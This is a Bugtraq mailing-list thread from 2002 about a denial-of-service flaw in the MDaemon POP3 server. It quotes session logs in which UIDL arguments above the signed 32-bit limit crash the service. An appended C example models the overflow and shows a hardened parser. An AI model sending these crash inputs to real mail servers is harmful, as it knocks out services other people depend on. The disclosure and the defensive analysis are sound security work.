[27650] in bugtraq
RE: MDaemon SMTP/POP/IMAP server DoS
daemon@ATHENA.MIT.EDU (Robert Feldbauer)
Wed Oct 30 01:28:04 2002
Reply-To: <wuher@swrpg.net>
From: "Robert Feldbauer" <wuher@swrpg.net>
To: <bugtraq@securityfocus.com>
Date: Tue, 29 Oct 2002 11:30:46 -0500
Message-ID: <DMEHLMEHKDDEMOFNBKACMEBOCDAA.wuher@swrpg.net>
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
In-Reply-To: <PCENLIEJEGBOLCENLIEAKEPOECAA.basil.hussain@kodakweddings.com>

I'm running MDaemon 3.1.2 and this does not have any adverse effect.

Here's my log:

+OK daisydata.com POP3 server ready
<MDAEMON-F200210291127.AA274532MD3626@mydomain.com>
USER myusername
+OK myusername... Recipient ok
PASS mypassword
+OK myusername@mydomain.com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648
UIDL 2147483649
+OK -2147483647
UIDL 2147483650
+OK -2147483646

And it responds to "QUIT" just fine.

Bob Feldbauer
wuher@swrpg.net

> -----Original Message-----
> From: Basil Hussain [mailto:basil.hussain@kodakweddings.com]
> Sent: Tuesday, October 29, 2002 5:27 AM
> To: bugtraq@securityfocus.com
> Subject: RE: MDaemon SMTP/POP/IMAP server DoS
>
>
> Hi all,
>
> > Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
> > sending long arguments (32b and above) with DELE or UIDL commands.
> > To do this you must have at least a mail account on the vulnerable host.
> > After getting a long request from the client, all MDaemon's services will be
> > closed (smtp, imap, pop, (?)worldclient).
> > Here the log of attack on local MDaemon POP-server:
> >
> > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
> > <MDAEMON-F200210271036.AA3656130MD0012@dark.ru>
> > USER D4rkGr3y
> > +OK D4rkGr3y... Recipient ok
> > PASS cool-pass
> > +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
> > UIDL 11111111111111111111111111111111
>
> It would appear this is not an issue with the length of string passed to
> MDaemon, but rather an integer overflow problem. After some testing, I've
> discovered that if you pass any number greater than 2147483647 (the limit
> for a signed 4-byte integer), you either get an error or a complete crash
> of MDaemon. For example:
>
> +OK somedomain.com POP MDaemon 6.0.5 ready
> <MDAEMON-F200210290951.AA5138234MD2795@somedomain.com>
> USER blah
> +OK blah... Recipient ok
> PASS 123456
> +OK blah@somedomain.com's mailbox has 0 total messages (0 octets).
> UIDL 2147483647
> -ERR no such message
> UIDL 2147483648
> +OK -2147483648 !!! Index 0 is not used
> UIDL 2147483649
>
> [Connection lost at this point...]
>
> By the way, you may have noticed this also works with a slightly older
> release (6.0.5). Also, hostname and account details have been changed to
> protect the guilty... :-)
>
> Also, I don't know whether this was something with how my test W2K server
> was set up, but MDaemon would auto-restart afterwards, thus making this bug
> not so much of a show-stopper and limiting scope for a Denial-of-Service
> attack somewhat.
>
> Regards,
> Basil Hussain
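
The wraparound discussed in this thread, as an added example that is not part of either post and is not MDaemon's code: a constructed model of a 32-bit message-number parse that reproduces the negative values echoed in the logs, beside a hardened parse for the UIDL/DELE argument. The function names and the upper-bound-only check are assumptions inferred from the logged replies.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed model, not MDaemon's code: digits are accumulated in 32 bits
   and the result is then read as a signed value. */
static int32_t parse_wrapping(const char *s) {
    uint32_t v = 0;
    while (*s >= '0' && *s <= '9')
        v = v * 10u + (uint32_t)(*s++ - '0');   /* wraps modulo 2^32 */
    /* Reinterpret as two's complement without an out-of-range cast. */
    return v <= INT32_MAX ? (int32_t)v
                          : (int32_t)(v - 2147483648u) + INT32_MIN;
}

/* Assumed weak check: only the upper bound is tested, so a wrapped
   (negative) number is never "greater than the message count". */
static int weak_accepts(int32_t n, int32_t count) { return !(n > count); }

/* Hardened parse: digits only, overflow detected, range 1..count enforced.
   Returns 1 and stores the number on success, 0 otherwise. */
static int parse_msgnum(const char *arg, long count, long *out) {
    char *end;
    if (*arg < '0' || *arg > '9') return 0;     /* no sign, no whitespace */
    errno = 0;
    long n = strtol(arg, &end, 10);
    if (errno == ERANGE || *end != '\0') return 0;
    if (n < 1 || n > count) return 0;
    *out = n;
    return 1;
}

int main(void) {
    /* Arguments taken from the logs in the thread; mailbox size 1 is constructed. */
    const char *args[] = { "1", "2147483647", "2147483648", "2147483649",
                           "11111111111111111111111111111111" };
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++) {
        long n = 0;
        int32_t w = parse_wrapping(args[i]);
        printf("%-34s wrapped=%ld weak=%d hardened=%d\n", args[i], (long)w,
               weak_accepts(w, 1), parse_msgnum(args[i], 1, &n));
    }
    return 0;
}
```

The hardened parser rejects every out-of-range argument before any mailbox index is computed, so neither the wrapped negative value nor the 32-digit argument reaches the lookup.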